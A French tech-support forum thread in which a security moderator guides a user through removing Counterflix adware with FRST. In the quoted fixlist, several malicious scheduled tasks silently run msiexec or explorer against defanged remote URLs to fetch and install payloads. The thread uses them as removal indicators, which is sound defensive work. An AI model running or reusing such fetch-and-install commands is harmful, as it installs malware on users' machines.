Nombreuses pubs ave Counterflix

Résolu
coco -  
Malekal_morte- Messages postés 178136 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   -
Bonjour, depuis deux jours, de nombreuses pubs apparaissent sur chrome à cause de counterflix. Je ne sais pas comment les enlever.

Pouvez-vous m'aider ?

Merci

7 réponses

  1. Malekal_morte- Messages postés 178136 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 712
     
    Salut,

    En général, cet adware modifie les serveurs DNS.

    Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).

    Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
    • FRST.txt
    • Shortcut.txt
    • Additionnal.txt


    Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.

    0
  2. coco
     
    Merci pour la réponse. Voici les liens

    FRST: http://pjjoint.malekal.com/files.php?id=FRST_20170414_8l13e13f14l5

    Additionnal: http://pjjoint.malekal.com/files.php?id=20170414_i11t9i5j10m7

    Shortcut: http://pjjoint.malekal.com/files.php?id=20170414_y13l11r12z10t8
    0
  3. Malekal_morte- Messages postés 178136 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 712
     
    Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

    Ouvre le bloc-notes : Touche Windows + R,
    Dans le champs "Exécuter", saisir notepad et OK.
    Copie/Colle dedans ce qui suit :

    CreateRestorePoint:
    CloseProcesses:
    HKLM\...\Providers\igt9hqh9: C:\Program Files (x86)\Ghocacultreererle Renew\local64spl.dll [307200 2017-04-12] ()
    ShellExecuteHooks: Pas de nom - {0A767F30-1B4A-11E7-9EAE-64006A5CFC23} - C:\Users\marie\AppData\Roaming\Rersertainthigert\Goceshlooward.dll -> Pas de fichier
    R2 WinSAPSvc; C:\Users\marie\AppData\Roaming\WinSAPSvc\WinSAP.dll [553984 2017-04-13] (winsap) [Fichier non signé]
    Task: {42D44F24-B3E3-4ACB-BB65-498261F77651} - System32\Tasks\Samsung Update => msiexec /i hxxp://D2Buh1bF1G584W.CLouDfRoNT.net/mmtsk/occup.php?p=TOSHIBAXMQ01ABF050_Y6AAWY4GTXXY6AAWY4GT&d=20170413 /q
    Task: {939C7363-BBA0-497E-92F8-BE606FE94625} - System32\Tasks\{E21D9614-55B6-21BF-78F6-CAF1C954CF75} => C:\ProgramData\{388509B7-8F2E-BE1C-96A1-C87EF0BFE242}\FB0BD259-4CA0-65F2-9F2D-87952A6C2DB3.exe [2017-04-13] () <==== ATTENTION
    Task: {E7BB8A02-8A0E-4330-9F5B-CCDD98902C78} - \{0E780B47-7D78-7F7D-7F11-0C0B0C0B117D} -> Pas de fichier <==== ATTENTION
    Task: {7423053E-F968-44C5-98F7-A809B27281FF} - System32\Tasks\Popuspclerdersh => "msiexec" /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=TOSHIBAXMQ01ABF050_Y6AAWY4GTXXY6AAWY4GT&d=20170412 /q
    Task: {9673A367-DA57-4639-A26C-71353D910C28} - System32\Tasks\{7D2DAACC-0707-A7B1-D24D-6F8AEBED1F16} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\c7cee0d\56616606.dll" <==== ATTENTION
    Task: {AA7A94A8-5911-42B0-8F08-D6477D70E6B6} - System32\Tasks\PPI Update => C:\windows\explorer.exe "hxxp://insightcdn.online/download/index.php?mn=9995" <==== ATTENTION
    2017-04-14 14:26 - 2017-04-14 14:26 - 01129376 _____ (Google Inc.) C:\Users\marie\Downloads\ChromeSetup (1).exe
    2017-04-13 23:51 - 2017-04-13 23:51 - 00000000 ___HD C:\.~BT
    2017-04-13 21:53 - 2017-04-13 21:53 - 00000000 ___HD C:\
    2017-04-13 21:42 - 2017-04-13 21:53 - 00000000 ____D C:\ProgramData\c7cee0d
    2017-04-13 21:42 - 2017-04-13 21:42 - 00003972 _____ C:\windows\System32\Tasks\{E21D9614-55B6-21BF-78F6-CAF1C954CF75}
    2017-04-13 21:42 - 2017-04-13 21:42 - 00003878 _____ C:\windows\System32\Tasks\{7D2DAACC-0707-A7B1-D24D-6F8AEBED1F16}
    2017-04-13 21:42 - 2017-04-13 21:42 - 00000000 ____D C:\ProgramData\8a6f4dd3-7d35-0
    2017-04-13 21:42 - 2017-04-13 21:42 - 00000000 ____D C:\ProgramData\8a6f4dd3-35f1-0
    2017-04-13 21:42 - 2017-04-13 21:42 - 00000000 ____D C:\ProgramData\{689522dd-712c-1}
    2017-04-13 21:42 - 2017-04-13 21:42 - 00000000 ____D C:\ProgramData\{5b8e6739-012c-0}
    2017-04-13 21:42 - 2017-04-13 21:42 - 00000000 ____D C:\ProgramData\{56614b2a-512c-1}
    2017-04-13 21:42 - 2017-04-13 21:42 - 00000000 ____D C:\ProgramData\{4d0a2888-312c-0}
    2017-04-13 21:42 - 2017-04-13 21:42 - 00000000 ____D C:\ProgramData\{388509B7-8F2E-BE1C-96A1-C87EF0BFE242}
    2017-04-13 14:32 - 2017-04-13 14:32 - 00000000 ____D C:\Users\marie\AppData\Local\UNP
    2017-04-13 13:38 - 2017-04-13 14:00 - 00005344 _____ C:\windows\System32\Tasks\Microsoft Office 15 Sync Maintenance for LAPTOP-UP611ITJ-marie LAPTOP-UP611ITJ
    2017-04-13 11:54 - 2017-04-13 11:54 - 00004072 _____ C:\windows\System32\Tasks\Samsung Update
    2017-04-13 08:13 - 2017-04-13 23:53 - 00000000 ____D C:\Program Files\UNP
    2017-04-13 08:05 - 2017-04-13 08:05 - 00000000 ____D C:\Users\marie\AppData\Local\SNARE
    2017-04-13 08:05 - 2017-04-13 08:05 - 00000000 ____D C:\Users\marie\AppData\Local\Kitty
    2017-04-13 08:04 - 2017-04-13 22:11 - 00000000 ____D C:\Users\marie\AppData\Local\AMD
    2017-04-13 08:04 - 2017-04-13 11:54 - 00003676 _____ C:\windows\System32\Tasks\Milimili
    2017-04-13 08:04 - 2017-04-13 11:54 - 00003590 _____ C:\windows\System32\Tasks\Windows-PG
    2017-04-13 08:04 - 2017-04-13 11:54 - 00000000 ____D C:\Users\marie\AppData\Roaming\WinSAPSvc
    2017-04-13 08:04 - 2017-04-13 08:45 - 00000000 ____D C:\Program Files (x86)\MIO
    2017-04-13 08:04 - 2017-04-13 08:04 - 00000000 ____D C:\Users\marie\AppData\Local\SNARER
    2017-04-13 08:04 - 2017-04-13 08:04 - 00000000 ____D C:\Update
    2017-04-13 08:00 - 2017-04-13 11:54 - 00000000 ____D C:\Program Files\MK
    2017-04-13 08:00 - 2017-04-13 08:00 - 00000000 ____D C:\Program Files (x86)\MK
    2017-04-13 07:59 - 2017-04-13 07:59 - 00000000 ____D C:\Program Files (x86)\igt9hqh9
    2017-04-12 20:44 - 2017-04-12 08:31 - 00532136 ____N (Microsoft Corporation) C:\windows\system32\MpSigStub.exe
    2017-04-12 20:39 - 2017-04-12 20:39 - 00002664 _____ C:\Users\marie\Desktop\Word 2013.lnk
    2017-04-12 20:39 - 2017-04-12 20:39 - 00002660 _____ C:\Users\marie\Desktop\PowerPoint 2013.lnk
    2017-04-12 20:23 - 2017-04-12 20:23 - 00564112 _____ C:\Users\marie\Downloads\favoris_12_04_2017.html
    2017-04-12 20:06 - 2017-04-12 20:06 - 00004608 _____ C:\windows\SECOH-QAD.exe
    2017-04-12 20:06 - 2017-04-12 20:06 - 00003584 _____ C:\windows\SECOH-QAD.dll
    2017-04-12 20:05 - 2017-04-12 20:48 - 00000000 ____D C:\Program Files\KMSpico
    2017-04-12 19:50 - 2017-04-13 21:58 - 00000000 ____D C:\Program Files (x86)\Mjeward
    2017-04-12 19:50 - 2017-04-12 20:08 - 00000000 ____D C:\Users\marie\AppData\Roaming\Rersertainthigert
    2017-04-12 19:50 - 2017-04-12 19:51 - 00000000 ____D C:\Users\marie\AppData\Local\Ghuitainshgesh
    2017-04-12 19:50 - 2017-04-12 19:50 - 00006124 _____ C:\windows\System32\Tasks\Ghocacultreererle Renew
    2017-04-12 19:50 - 2017-04-12 19:50 - 00006106 _____ C:\windows\System32\Tasks\Popuspclerdersh
    2017-04-12 19:50 - 2017-04-12 19:50 - 00000000 ____D C:\Program Files (x86)\Ghocacultreererle Renew
    2017-04-12 19:40 - 2017-04-13 21:42 - 00000000 ____D C:\ProgramData\f9addfc5-6b95-1
    2017-04-12 19:40 - 2017-04-13 21:42 - 00000000 ____D C:\ProgramData\f9addfc5-1057-0
    2017-04-12 19:39 - 2017-04-13 22:43 - 00000000 ____D C:\Program Files (x86)\Windows Loader
    2017-04-12 19:39 - 2017-04-12 19:39 - 00003628 _____ C:\windows\System32\Tasks\PPI Update
    EmptyTemp:
    RemoveProxy:
    Reboot:


    Une fois, le texte collé dans le Bloc-notes,
    Menu "Fichier" puis "Enregistrer sous",
    A gauche, place toi sur le Bureau,
    Dans le champs en bas, nom du fichier mets : fixlist.txt
    Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

    Relance FRST et clique sur le bouton "Corriger / Fix"
    Un redémarrage sera peut-être nécessaire ( pas obligatoire )
    Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

    Redémarre l'ordinateur.

    2°)
    Réinitialise/Répare les navigateurs WEB concernés par les problèmes :

    3°)
    Fais un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite

    4°)
    Refais un scan FRST et donne les nouveaux rapports via pjjoint

    0
  4. coco
     
    Voici les nouveaux liens:

    shortcut: http://pjjoint.malekal.com/files.php?id=20170414_h14b11u87s11

    FRST: http://pjjoint.malekal.com/files.php?id=FRST_20170414_t14i14n13n15b10

    Additionnal: http://pjjoint.malekal.com/files.php?id=20170414_b12p14c11l5y12
    0
  5. Vous n’avez pas trouvé la réponse que vous recherchez ?

    Posez votre question
  6. Malekal_morte- Messages postés 178136 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 712
     
    y a du mieux ou pas ?
    0
  7. Malekal_morte- Messages postés 178136 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   24 712
     
    cool =)

    Supprime le dossier C:\FRST

    Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite

    Quelques conseils :

    Pour ne plus te faire avoir.
    A lire - Programmes parasites / PUPs : Dossier Adwares/PUPs : programmes indésirables et parasites
    (Surtout active les détections LPIs pour détecter les programmes parasites et publicitaires)

    0